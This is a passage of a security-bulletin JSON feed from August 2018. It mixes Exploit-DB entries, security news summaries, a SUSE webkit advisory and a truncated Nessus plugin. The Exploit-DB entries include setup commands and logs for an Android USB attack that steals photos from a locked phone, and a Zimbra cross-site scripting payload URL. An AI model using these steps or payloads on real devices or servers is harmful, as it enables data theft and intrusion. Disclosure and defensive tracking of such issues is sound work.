be the generated package.odex.\r\n - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\n should be the fixed-up package.vdex.\r\n\r\nCopy the two disk images to the Raspberry Pi Zero W; the fake romfs image should\r\nbe named \"disk_image_blkid\", the image with FAT32 should be named\r\n\"disk_image_mount\". On the Pi, build the fuse_intercept helper:\r\n\r\n$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept\r\n\r\nThen create a directory \"mount\" and launch fuse_intercept.\r\n\r\nIn a second terminal, tell the Pi's kernel to present the contents of the mount\r\npoint as a mass storage device:\r\n\r\npi@raspberrypi:~ $ sudo modprobe dwc2\r\npi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0\r\n\r\n\r\nTo run the attack, connect the Pi to the powered USB hub as a device. Then use\r\na USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect\r\nthe powered hub to the locked phone, with the phone in USB host mode.\r\n\r\nAt this point, the phone should first mount the USB stick over\r\n/data, then immediately afterwards launch\r\ncom.android.externalstorage/.MountReceiver:\r\n\r\n06-05 21:58:20.988 656 665 I Vold : Filesystem check completed OK\r\n06-05 21:58:20.988 1115 1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:20.990 1115 1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:21.004 1115 1235 D VoldConnector: RCV <- {651 public:8,97 2}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.006 1115 1235 D VoldConnector: RCV <- {200 7 Command succeeded}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 
scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0 \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: state=MOUNTED \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data \r\n06-05 21:58:21.020 1115 1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver\r\n\r\nMost processes can't access the vfat filesystem that is now mounted at /data\r\neither because they lack the necessary groups or because of some SELinux rule.\r\nBut com.android.externalstorage passes both checks and can read and write (but\r\nnot execute) files from the new /data. 
Bytecode is loaded from\r\n/data/dalvik-cache/arm64/system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\nand then interpreted, allowing the attacker to steal photos from the device\r\n(since com.android.externalstorage has access to /storage/emulated/0):\r\n\r\n06-05 21:58:21.248 4478 4478 I zygote64: The ClassLoaderContext is a special shared library.\r\n06-05 21:58:21.276 4478 4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.\r\n06-05 21:58:21.278 4478 4478 W asset : failed to open idmap file /data/resource-cache/vendor@overlay@Pixel@PixelThemeOverlay.apk@idmap\r\n06-05 21:58:21.326 4478 4478 D ExternalStorage: After updating volumes, found 3 active roots\r\n06-05 21:58:21.334 4478 4478 E System : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\r\n06-05 21:58:21.343 4478 4478 E System : GRABBING 'IMG_20180605_212044.jpg'\r\n06-05 21:58:21.419 4478 4478 E System : GRABBING 'IMG_20180605_215031.jpg'\r\n06-05 21:58:21.428 2218 2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db\r\n06-05 21:58:21.465 4478 4478 E System : INJECTED CODE DONE\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45192/"}, {"lastseen": "2018-08-10T13:20:54", "osvdbidlist": [], "references": [], "description": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting. CVE-2016-3411. 
Webapps exploit for PHP platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-08-10T00:00:00", "title": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-08-10T13:20:54", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3411"], "modified": "2018-08-10T00:00:00", "id": "EDB-ID:45177", "href": "https://www.exploit-db.com/exploits/45177/", "sourceData": "# Exploit Title: Xss Zimbra Mail server\r\n# Google Dork:\r\n# Date: 2018/08/10\r\n# Exploit Author: Dinbar78\r\n# Vendor Homepage: https://www.zimbra.com/\r\n\r\n# Version: 8.6.0_GA_1153 (build 20141215151110)\r\n# bug 103609 or CVE-2016-3411\r\n\r\n\r\nPayload: es.\r\nhttps:// (zimbrasite)/h/changepass?skin=\"><script>alert('hacked');</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45177/"}], "hackread": [{"lastseen": "2018-08-11T01:07:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nHackers Demand Ransom to Unlock Hijacked Files of Upcoming PGA Golf Championship. Hackers seem to have a penchant for targeting high-profile events. After successfully attempting to make American presidential elections questionable, now cybercriminals have their eyes set on key PGA tournaments. 
Reportedly, to jeopardize this week\u2019s PGA Championship, which is due to be held at [\u2026]\n\nThis is a post from HackRead.com Read the original post: [PGA Golf Championship hit with Bitcoin ransomware](<https://www.hackread.com/pga-golf-championship-hit-with-bitcoin-ransomware/>)", "reporter": "Waqas", "published": "2018-08-10T22:47:03", "type": "hackread", "title": "PGA Golf Championship hit with Bitcoin ransomware", "enchantments": {"score": {"modified": "2018-08-11T01:07:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T22:47:03", "id": "HACKREAD:DF62540CF10E554E3B5A3460BA8B353A", "href": "https://www.hackread.com/pga-golf-championship-hit-with-bitcoin-ransomware/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-10T23:15:33", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "By [Uzair Amir](<https://www.hackread.com/author/uzair/>)\n\nTrend Micro researchers have discovered a malware listing on Dark Web marketplace that lets attackers steal from Bitcoin ATMs. They can easily rake in cryptocurrency worth 6,750 in Euros, Pounds or Dollars by attacking the ATMs. The listing was perhaps created on June 25, 2018. It is available at a whopping price tag of $25,000. 
[\u2026]\n\nThis is a post from HackRead.com Read the original post: [Cyber Criminals selling Bitcoin ATM Malware on Dark Web](<https://www.hackread.com/sellers-demanding-25000-for-bitcoin-atm-malware-at-the-dark-web/>)", "reporter": "Uzair Amir", "published": "2018-08-10T10:14:58", "type": "hackread", "title": "Cyber Criminals selling Bitcoin ATM Malware on Dark Web", "enchantments": {"score": {"modified": "2018-08-10T23:15:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T10:14:58", "id": "HACKREAD:043095D83400E580149E7334FDED43ED", "href": "https://www.hackread.com/sellers-demanding-25000-for-bitcoin-atm-malware-at-the-dark-web/", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2018-08-10T17:05:00", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/05/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Singapore looks into the effectiveness of virtual browsers in an attempt to reduce cyberattacks on healthcare systems. 
Also, cybercriminals have hijacked the computer servers of the Professional Golfers\u2019 Association, locking officials out of crucial files related to upcoming rounds in the PGA Championship and the Ryder Cup in France.\n\nRead on:\n\n**[A Look Into Smart Factories: A Model of IIoT Innovation](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/a-look-into-smart-factories-a-model-of-iiot-innovation>)**\n\n_Organizations worldwide are integrating the internet of things (IoT) closely into how they do business, a move that is as much about keeping up with the rest of the world as it is about improving operations._\n\n**[Brian Gorenc at Black Hat 2018](<https://livestream.com/accounts/17221955/BlackHatUSA2018/videos/178675497>)**\n\n_Chuck Harold from Security Guy TV interviews Brian Gorenc onsite at Black Hat 2018 to discuss Trend Micro\u2019s depth of research and products across enterprise, consumer and IoT threats. _\n\n**[Ransomware as a Service Princess Evolution Looking for Affiliates](<https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-as-a-service-princess-evolution-looking-for-affiliates/>)**\n\n_We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. 
On August 1, we found Rig\u2019s traffic stream dropping a then-unknown ransomware._\n\n**[Fighting the Skills Gap Via Industry Leading Research and Inspiring Events](<https://blog.trendmicro.com/fighting-the-skills-gap-via-industry-leading-research-and-inspiring-events/>)**\n\n_Among the headline-grabbing reports of election hacking, nation-state raids on utilities firms, and mega-data breaches, few ask the question: Did the cybersecurity skills shortage play a part?_\n\n**[Hackers Could Use Facial Recognition AI to Sway Political Campaigns](<https://www.cbsnews.com/news/local-politics-cybersecurity-hacking-artificial-intelligence-black-hat-convention-2018-las-vegas/>)**\n\n_CNET senior producer Dan Patterson, who is covering the Black Hat USA hacker convention in Las Vegas, says AI could soon play a role in infiltrating computers and common software used by consumers._\n\n**[How Machine Learning Can Help Identify Web Defacement Campaigns](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-machine-learning-can-help-identify-web-defacement-campaigns/>)**\n\n_TrendMicro expounds on why machine learning (ML) was an ideal method for analysis to understand better how web defacers operate and organize themselves._\n\n**[Singapore Explores Virtual Browsers Following SingHealth Data Breach](<https://www.zdnet.com/article/singapore-explores-virtual-browsers-following-singhealth-data-breach/>)**\n\n_Singapore is assessing the feasibility of virtual browsers to reduce the attack surface of healthcare systems following a critical cybersecurity breach that compromised the personal data of 1.5 million patients._\n\n**[Data Breaches Highlight the Need for Managed Detection and Response](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/data-breaches-highlight-the-need-for-managed-detection-and-response>)**\n\n_Whether from misconfiguration, patch lags, or unsecure networks, bridging security gaps and remediating attacks calls for a 
proactive approach \u2014 something that MDR can provide._\n\n**[Hackers Target PGA Servers, Seek Bitcoin Ransom](<https://golfweek.com/2018/08/08/hackers-target-pga-servers-seek-bitcoin-ransom/>)**\n\n_Cybercriminals have hijacked the Professional Golfers\u2019 Association (PGA) of America\u2019s computer servers, locking officials out of crucial files related to the PGA Championship and upcoming Ryder Cup in France._\n\nDo you think Machine Learning can help industry professionals understand how web defacers operate? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Hijacks and Healthcare](<https://blog.trendmicro.com/this-week-in-security-news-hijacks-and-healthcare/>) appeared first on [](<https://blog.trendmicro.com>).", "reporter": "Jon Clay (Global Threat Communications)", "published": "2018-08-10T14:56:36", "type": "trendmicroblog", "title": "This Week in Security News: Hijacks and Healthcare", "enchantments": {"score": {"modified": "2018-08-10T17:05:00", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T14:56:36", "id": "TRENDMICROBLOG:FC4EE7B03C3392A9C88E003AE9CFDB5D", "href": "https://blog.trendmicro.com/this-week-in-security-news-hijacks-and-healthcare/", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-08-10T04:48:17", "references": ["https://bugzilla.suse.com/1097693", "https://bugzilla.suse.com/1095611"], "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit-jsc-4-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit-jsc-4", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": 
"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-JavaScriptCore-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk-4_0-injected-bundles-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-WebKit2WebExtension-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-32bit-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-debugsource-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk-4_0-injected-bundles", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-devel-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", 
"packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk-4_0-injected-bundles-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk-4_0-injected-bundles", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libjavascriptcoregtk-4_0-18", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-32bit-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libjavascriptcoregtk-4_0-18-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-devel-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-JavaScriptCore-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37", "operator": "lt"}, {"OS": "openSUSE Leap", 
"OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "noarch", "packageFilename": "libwebkit2gtk3-lang-2.20.3-lp150.2.3.1.noarch.rpm", "packageName": "libwebkit2gtk3-lang", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit-jsc-4-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-WebKit2-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-32bit", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-debugsource-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": 
"15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libwebkit2gtk-4_0-37-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit-jsc-4-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libwebkit2gtk-4_0-37", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-WebKit2-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit-jsc-4-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit-jsc-4", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", 
"arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-32bit", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-WebKit2WebExtension-4_0", "operator": "lt"}], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails 
to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "reporter": "Suse", "published": "2018-08-10T03:08:49", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "enchantments": {"score": {"modified": "2018-08-10T04:48:17", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T03:08:49", "id": "OPENSUSE-SU-2018:2285-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-08-10T23:11:40", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1095611", "https://bugzilla.opensuse.org/show_bug.cgi?id=1097693"], "pluginID": "111626", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote 
attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues. 
This update was imported from the SUSE:SLE-15:Update update project.", "edition": 1, "reporter": "Tenable", "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)", "type": "nessus", "enchantments": {"score": {"modified": "2018-08-10T23:11:40", "vector": "NONE", "value": 6.8}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "id": "OPENSUSE-2018-845.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111626", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# 
